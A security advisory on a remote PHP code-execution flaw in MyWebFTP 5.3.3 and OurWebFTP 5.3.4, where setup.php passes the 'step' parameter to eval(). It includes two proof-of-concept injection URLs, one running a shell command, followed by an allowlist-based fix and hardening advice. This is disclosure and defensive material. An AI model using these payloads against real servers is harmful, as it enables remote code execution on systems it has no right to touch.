MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability

2012.07.24
Credit: condis
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-94

MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability
by condis, 04.10.2011

download:
http://www.mywebftp.com/download.php
http://www.ourwebftp.com/download.php

Source of setup.php:

    start_html();
    if( checkReady() ){                      // [1]
        init();
        listSetupOptions();
        if ( isset($_REQUEST['step']) ){
            $step = $_REQUEST['step'];
            eval("step_$step();");           // [!]
        }

The value of the "step" request parameter is concatenated into the string passed to eval() without any validation [!], so whatever follows "step_" is executed as PHP code.

To exploit this issue, everything must be configured properly so that the installation can be done without any errors [1]. To meet these conditions, all that is needed is a writable directory with the name defined in the LD_DIR constant, and that the administrator has not deleted setup.php.

Proof of Concept:

http://host.tld/myftpdir/setup.php?step=;phpinfo();//
http://host.tld/myftpdir/setup.php?step=;print_r(`uname -a`);//
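The eval() dispatch in the setup.php excerpt above can be replaced by a fixed allowlist lookup, so that the request value only selects a handler and never becomes code. This is an added example, not code from MyWebFTP, OurWebFTP or the advisory's author; the step names ("check", "install"), the handler bodies and dispatch_step() are hypothetical, since the advisory does not show the real step functions.

```php
<?php
declare(strict_types=1);

// Hypothetical step handlers; the products' real step_* functions are not
// shown in the advisory.
function step_check(): string   { return 'environment checked'; }
function step_install(): string { return 'configuration written'; }

// Fixed allowlist: request value => handler name chosen by the developer.
// Nothing from the request is concatenated into code or a function name.
const STEP_HANDLERS = [
    'check'   => 'step_check',
    'install' => 'step_install',
];

/**
 * Run the handler for a requested step, or return null if the value is not
 * an exact, known step name. No eval() and no dynamic name building.
 */
function dispatch_step($raw): ?string
{
    // step[]=x arrives as an array; reject every non-string value.
    if (!is_string($raw)) {
        return null;
    }
    // Exact key match only: any extra character fails the lookup.
    if (!array_key_exists($raw, STEP_HANDLERS)) {
        return null;
    }
    $handler = STEP_HANDLERS[$raw];
    return $handler();
}

// Constructed inputs: a valid step, the "step" value from the advisory's
// first PoC URL, an unknown step name, and an array-typed parameter.
$samples = ['check', ';phpinfo();//', 'unknown', ['check']];

foreach ($samples as $input) {
    $result = dispatch_step($input);
    echo json_encode($input, JSON_UNESCAPED_SLASHES), ' => ',
         $result === null ? 'rejected' : $result, PHP_EOL;
}
```

Because the advisory notes the issue is reachable only while setup.php is still present, removing that file after installation closes the entry point regardless of how the dispatch is written.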

References:

http://www.mywebftp.com/download.php
http://www.ourwebftp.com/download.php

